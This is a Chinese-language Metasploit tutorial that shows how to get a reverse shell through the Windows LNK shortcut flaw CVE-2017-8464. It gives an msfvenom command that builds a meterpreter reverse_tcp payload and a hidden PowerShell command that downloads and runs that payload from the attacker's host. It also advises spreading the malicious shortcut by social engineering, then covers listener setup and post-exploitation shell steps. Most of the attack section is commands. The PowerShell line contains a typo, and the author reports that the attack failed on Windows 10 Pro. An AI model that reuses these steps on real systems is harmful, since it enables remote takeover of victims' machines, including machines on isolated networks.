《metasploit学习》-“震网三代“反弹shell实例

一、什么是 CVE-2017-8464:

说明:

2017年6月13日,微软官方发布编号为CVE-2017-8464的洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危

传播的载体一般是LNK,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

危害:被攻击机插入存在攻击Ink的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

二、环境准备:

1、可复现的操作系统版本

Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based Systems

Microsoft Windows 10 for 32-bit Systems

Microsoft Windows 10 for x64-based SystemsMicrosoft Windows 10 version 1511 for 32-bit Systems

Microsoft Windows 10 version 1511 for x64-based Systems

Microsoft Windows 10 version 1703 for 32-bit Systems

Microsoft Windows 10 version 1703 for x64-based Systems

Microsoft Windows 7 for 32-bit Systems SP1

Microsoft Windows 7 for x64-based Systems SP1

Microsoft Windows 8.1 for 32-bit Systems

Microsoft Windows 8.1 for x64-based Systems

Microsoft Windows RT 8.1

2 可复现的服务器系统版本

Microsoft Windows Server 2008 R2 for ltanium-based Systems SP1

Microsoft Windows Server 2008 R2 for x64-based Systems SP1

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for ltanium-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

3 kali操作系统

三、利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远程控制

四、实战利用

启动MSF

终端内输入:msfconsole

1、使用MSF创建一个后门

新开一个终端内输入:

c 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.74 lport=4456 -f psh-reflection>/var/www/html/link.ps1
2、在kali下开启apache2

在kali的非msf终端内输入:service apache2 start,

3、通过社会学进行快捷方式传播

在靶机,新建快捷方式,输入下面的内容,可以右键修改图标

c 复制代码
powershell -windowstyle hidden -exec bypass -c "IEX(New-ObjectNet.WebClient).DownloadString('http://192.168.0.74/link.ps1');test.ps1"

这里的IP地址是kali的IP地址

4 回到MSF终端配置监听

msf内输入:use exploit/multi/handler

5 配置payload

set payload windows/x64/meterpreter/reverse_tcp (和生成后门时用的payload路径一样)

msf中输入:show options 配置payload,设置 LHOST 和 LPORT为kali的IP地址和对应的端口4456

输入run进行监听,win10进行点击快捷方式,就能获取到meterpreter了

接下来就是后渗透阶段

五、后渗透

1、通过快捷方式执行程序

meterpreter中输入 shell

发现shell显示有乱码,shell内输入 chcp 65001

然后进入desktop目录(这个是win的桌面)

根据实际情况拼路径

shell 里输入:cd users/mb/desktop (根据靶机的实际进入桌面)

问题:

靶机win10的版本是win10专业版,监听不到,进不去meterpreter